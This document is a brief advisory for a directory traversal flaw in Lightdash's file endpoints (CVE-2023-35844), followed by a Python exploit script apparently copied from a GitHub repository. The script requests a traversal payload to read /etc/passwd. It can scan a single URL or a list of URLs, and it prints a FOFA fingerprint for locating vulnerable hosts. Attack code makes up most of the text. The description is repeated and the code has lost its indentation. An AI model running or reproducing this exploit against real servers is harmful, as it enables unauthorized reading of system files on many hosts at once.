packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow ..
directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
URL - https://github.com/Szlein/CVE-2023-35844
directory traversal and do not ensure that an intended file extension (.csv or .png) is used.
Python:
import requests
import sys
print('+------------------------------------------')
print('+ \033[36m使用格式: python3 CVE-2023-35844.py -u https://x.x.x.x \033[0m')
print('+ \033[36m使用格式: python3 CVE-2023-35844.py -f xxx.txt \033[0m')
print('+ \033[36m指纹特征: fofa: "Lightdash" \033[0m')
print('+ \033[36mauther >>> Lsec \033[0m')
print('+------------------------------------------')
payload = "/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"
#只扫描url
def url_poc(url):
domain = url + payload
requests.packages.urllib3.disable_warnings()
resp = requests.get(domain,verify=False)
if "root" in resp.text:
print(url+"存在漏洞")
print(resp.text)
def list_url_poc(urls):
with open(urls, "r") as f:
for url in f.readlines():
domain = (url.strip() + payload)
requests.packages.urllib3.disable_warnings()
resp = requests.get(domain, verify=False)
if "root" in resp.text:
print(url + "存在漏洞")
print(resp.text)
if __name__ == '__main__':
if len(sys.argv) != 3:
print("Usage: python CVE-2023-35844.py -u <url>")
print("Usage: python CVE-2023-35844.py -f <url>")
sys.exit(1)
if sys.argv[1] == "-u":
url = sys.argv[2]
url_poc(url)
elif sys.argv[1] == "-f":
urls = sys.argv[2]
list_url_poc(urls)URL - https://github.com/Szlein/CVE-2023-35844